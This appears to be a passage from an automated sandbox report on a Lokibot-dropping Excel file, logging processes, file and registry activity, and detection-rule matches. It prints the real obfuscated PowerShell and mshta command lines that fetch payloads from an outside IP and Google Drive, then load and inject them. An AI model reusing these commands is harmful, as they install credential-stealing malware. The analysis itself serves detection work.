BRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: 770B0000 page execute and read and write

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_000007FE89A81E3D	6_2_000007FE89A81E3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 16_2_0040549C	16_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 16_2_004029D4	16_2_004029D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 16_2_00B72050	16_2_00B72050

Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

OLE indicator, VBA macros: true

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2262
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2262			Jump to behavior

Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: powershell.exe PID: 3036, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: AddInProcess32.exe PID: 1488, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@18/28@4/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 16_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

16_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 16_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

16_2_0040434D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8229.tmp

Jump to behavior

Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	OLE indicator, Workbook stream: true
Source: 09230000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.m.......m.....P?......................P?......X?.......................3......................P?..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3......................@...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................+k....}..w....@.......\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.......}..w..............V.....8.+k......U.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................+k....}..w....@.......\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.......}..w..............V.....8.+k......U.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...V.....8.+k......U.....(.P............................. .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .d.e.V.I.C.E.C.r.E.d.e.n.T.I.a.L.D.e.P.l.O.Y.M.E.N.T...e.x.e.........................@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.......}..w..............V.....8.+k......U.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................@.......}..w..............V.....8.+k......U.....(.P.............................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......@.......}..w..............V.....8.+k......U.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......H...............@]..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................H...............................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, 